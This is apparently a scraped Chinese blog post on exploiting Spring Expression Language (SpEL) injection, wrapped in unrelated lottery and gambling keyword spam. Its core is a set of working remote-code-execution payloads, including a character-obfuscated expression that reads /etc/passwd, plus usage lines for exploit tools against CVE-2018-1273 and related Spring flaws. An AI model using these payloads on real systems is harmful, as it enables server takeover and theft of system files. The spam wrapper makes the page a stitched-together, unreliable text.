双色球彩民乐预测 今晚双色球预测最准确号码预测 双色球开奖玩法说明 双色球中奖图片恶搞 双色球精准预测6十1玉玲珑 微信可以购买双色球吗 双色球走势图表近50期 双色球中奖方法 双色球开奖结果走势图全图 双色球连号组数怎么看 双色球开奖查询表 双色球选号技巧 双色球专家杀号360 双色球预测最准确专家 程远双色球预测分析

Spring SPEL注入漏洞利用

0c0c0f 2018-06-16 16:38:47

SPEL注入POC:

命令回顯poc:

T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())

${@[email protected](@[email protected]().exec(%27netstat%20-na%27).getInputStream())}

..

命令執行poc:

#{request.getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\"touch/tmp/foobar\")}

username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf

..

近期pivotal官方的漏洞利用,如下:

漏洞編號: 

cve-2018-1273

漏洞環境:

/Users/***/soft/vulapp/spring-data-examples/web/projection/target

漏洞利用:

package com.evil.exp   SpringDataCommonsRCE
args -u http://127.0.0.1:8080/ -cmd ls

漏洞來源:https://pivotal.io/security/cve-2018-1273

漏洞編號:cve-2018-1273

漏洞環境:

/Users/***/javaweb/spring-boot-2.0.0.M2/spring-boot-samples/spring-boot-sample-data-rest/target

漏洞利用:

package com.evil.exp   SpringDataRestRCE
args -u lshttp://127.0.0.1:8080/api/cities/1-cmd ls

漏洞編號:cve-2018-1273

漏洞環境:

/Users/***/javaweb/gs-messaging-stomp-websocket/complete/target

漏洞利用:

package com.evil.exp  SpringMessagingRCE
ws://127.0.0.1:8080/hello /topic/greetings /Applications/Calculator.ap

參考: 
https://github.com/genxor/CVE-2018-1270_EXP
https://www.exploit-db.com/exploits/44289/



双色球吧贴
双色球彩民乐预测 今晚双色球预测最准确号码预测 双色球开奖玩法说明 双色球中奖图片恶搞 双色球精准预测6十1玉玲珑 微信可以购买双色球吗 双色球走势图表近50期 双色球中奖方法 双色球开奖结果走势图全图 双色球连号组数怎么看 双色球开奖查询表 双色球选号技巧 双色球专家杀号360 双色球预测最准确专家 程远双色球预测分析
古怪猴子秘诀 易算时时彩计划 福利彩票26选5开奖 完美世界手游贴吧捏脸 巴拉多利德排第几 图卢兹保级队 蒙彼利埃圣埃蒂安 猎鱼达人3d外挂 炉石传说竞技场职业选择 pk10输惨了一无所有 金库甜心返水 马德里韦斯卡 电竞比分去哪买 二十二世古墓奇兵 2003波尔多红酒价格 金皇冠大酒店怎么样